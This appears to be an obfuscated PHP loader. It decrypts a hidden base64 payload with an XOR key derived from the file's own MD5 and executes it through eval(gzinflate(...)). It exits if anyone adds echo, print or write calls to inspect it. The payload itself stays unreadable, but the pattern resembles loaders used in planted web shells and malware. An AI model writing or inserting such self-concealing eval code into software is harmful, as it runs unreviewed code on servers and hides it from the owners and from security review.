<?php
$fhyehgagoa="7e51329c834c127d8655663b40bd5e67";
$yffzgnwlzgqx="560704030b545a5a0c040d5b530006505e065005015502045701575c05550106";
$jxansahncg="rDBgWfpWe8UfsLGRIffWodC4EzyRyJnW5Gt/7pYGb6LzJCi+xZHGjBa1NtYPNqPEG/eA3olrSwY2eCa+eWlZljMKFLm6zwmCeiNamrhcJdHcgsTbJKjzBuBFiqgZ8wB7pC1lAVwh8lEaMk90PRICns/lUpBZKjr8ESBGqXkI39v9NXIFxXrZIOd+V5nRxNbKErNCjJvhNOjh2o2UWcDG284erUpptn6S1nvwe65hctYHwluLAdddrf4w986xhi4j//BZskOza0QvvdCbcDpwbsc060ucWRUBLlwKutdRu/mn7WiF8dqqvuaeWO/mqmNmf8nh6Nd6nSJ9tIOCwQJvXpsSAJxpX8AQZyGg8+bkRfu+qYy9/d/FPDA/9NCef2QX3MiomutiuAIsvrfpct38cio6ibvcuf5DbuNdAnfha97bH90ZPJmn0uubxzo=";
$kibofeaq=file_get_contents(__FILE__);
$lzmptjklm=str_replace($jxansahncg,"",$kibofeaq);
if(strpos($lzmptjklm,"ec"."ho")!==false||strpos($lzmptjklm,"pr"."int")!==false||strpos($lzmptjklm,"var_"."dump")!==false||strpos($lzmptjklm,"file_put_"."contents")!==false||strpos($lzmptjklm,"fw"."rite")!==false){die();}
$kqwubhm=str_replace(array($fhyehgagoa,$yffzgnwlzgqx),array("SP_db81df3c","KP_fd3f6ab4"),$kibofeaq);
$kmcoxxmyr=md5($kqwubhm);
$tcicbx=hex2bin($yffzgnwlzgqx);
$qntwpcl="";
$xrgommjlgc=strlen($kmcoxxmyr);
for($wtmrbhrn=0;$wtmrbhrn<$xrgommjlgc;$wtmrbhrn++){
    $qntwpcl.=chr(ord($tcicbx[$wtmrbhrn])^ord($kmcoxxmyr[$wtmrbhrn]));
}
$cllmqix=base64_decode($jxansahncg);
$jhfnblna=strlen($cllmqix);
$euzwviu="";
$iillohrtegxd=strlen($qntwpcl);
for($wtmrbhrn=0;$wtmrbhrn<$jhfnblna;$wtmrbhrn++){
    $euzwviu.=$cllmqix[$wtmrbhrn]^$qntwpcl[$wtmrbhrn%$iillohrtegxd];
}
$ymevrhdfbstu="gz"."in"."fl"."ate";
eval($ymevrhdfbstu($euzwviu));
